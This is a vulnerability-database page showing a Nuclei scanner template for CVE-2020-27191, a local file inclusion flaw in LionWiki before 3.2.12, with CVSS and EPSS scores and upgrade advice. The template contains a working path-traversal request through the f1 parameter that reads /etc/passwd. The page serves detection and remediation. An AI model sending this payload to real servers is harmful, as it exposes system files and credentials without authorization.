Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-27191
HistoryApr 04, 2022 - 10:50 a.m.

LionWiki <3.2.12 - Local File Inclusion

2022-04-0410:50:53
ProjectDiscovery
github.com
3

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.03 Low

EPSS

Percentile

90.9%

LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.

id: CVE-2020-27191

info:
  name: LionWiki <3.2.12 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
  remediation: |
    Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability.
  reference:
    - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
    - http://lionwiki.0o.cz/index.php?page=Main+page
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27191
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-27191
    cwe-id: CWE-22
    epss-score: 0.01572
    epss-percentile: 0.86986
    cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lionwiki
    product: lionwiki
  tags: cve2020,cve,lionwiki,lfi,oss

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 480a00453043022024fd9eabd5990697a1c0d513e268964dba7e4032104e676f2c1516f0d7bf1e6c021f01979b841bd595af2324f5a4beea443729213ab4e816a2f27b4f681dfe71ac:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.03 Low

EPSS

Percentile

90.9%

Related for NUCLEI:CVE-2020-27191